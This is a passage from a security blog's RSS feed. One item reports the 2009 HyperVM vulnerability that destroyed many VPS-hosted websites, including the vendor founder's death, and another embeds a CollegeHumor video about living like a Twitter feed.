			<content:encoded><![CDATA[<p>“We have been working diligently to recover the information that we can. Currently if your VPS is not responding it is best to consider that all data and information is lost…” This is the start of a message posted on VAServ’s website, a UK-based provider of virtual private servers.  VAServ uses HyperVM, a virtualization application developed by Bangalore-based LxLabs, which was found to contain critical vulnerabilities that led to a zero-day, data-destroying attack leaving many clients in the dark.  A <a href="http://www.theregister.co.uk/2009/06/08/webhost_attack/">report</a> from The Register states that as many as 100,000 websites were destroyed, most without any option of a data restore. The vulnerabilities were <a href="http://www.milw0rm.com/exploits/8880">posted</a> on May 21 and the timeline suggests the software vendor had ignored the warnings. Additionally, LxLabs founder and owner K.T. Ligesh committed suicide this week by hanging himself.  His best friend reported Ligesh was depressed over losing an important contract.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/06/warnings-ignored-thousands-of-websites-suffer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CollegeHumor explores the concept of real life tweeting</title>
		<link>http://praetorianprefect.com/archives/2009/05/collegehumor-explores-the-concept-of-real-life-tweeting/</link>
		<comments>http://praetorianprefect.com/archives/2009/05/collegehumor-explores-the-concept-of-real-life-tweeting/#comments</comments>
		<pubDate>Fri, 01 May 2009 23:33:26 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=181</guid>
		<description><![CDATA[What if you walked through life providing twarcissistic updates as some are wont to do on Twitter. CollegeHumor.com explores what this might look like.]]></description>
			<content:encoded><![CDATA[<p>What if you walked through life providing twarcissistic updates as some are wont to do on Twitter. CollegeHumor.com explores what this might look like:</p>

<p><object type="application/x-shockwave-flash" data="http://www.collegehumor.com/moogaloop/moogaloop.swf?clip_id=1909386&#038;fullscreen=1" width="640" height="360" ><param name="allowfullscreen" value="true"/><param name="wmode" value="transparent"/><param name="AllowScriptAccess" value="true"/><param name="movie" quality="best" value="http://www.collegehumor.com/moogaloop/moogaloop.swf?clip_id=1909386&#038;fullscreen=1"/><embed src="http://www.collegehumor.com/moogaloop/moogaloop.swf?clip_id=1909386&#038;fullscreen=1" type="application/x-shockwave-flash" wmode="transparent"  width="640" height="360"  allowScriptAccess="always"></embed></object></p>

<div style="padding:5px 0; text-align:center; width:640px;">Watch <a href="http://www.collegehumor.com/video:1909386">Real Life Twitter</a> and more <a href="http://www.collegehumor.com/videos" >funny videos</a> on <a href="http://www.collegehumor.com/">CollegeHumor</a></div>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent XSS on Twitter.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/05/collegehumor-explores-the-concept-of-real-life-tweeting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
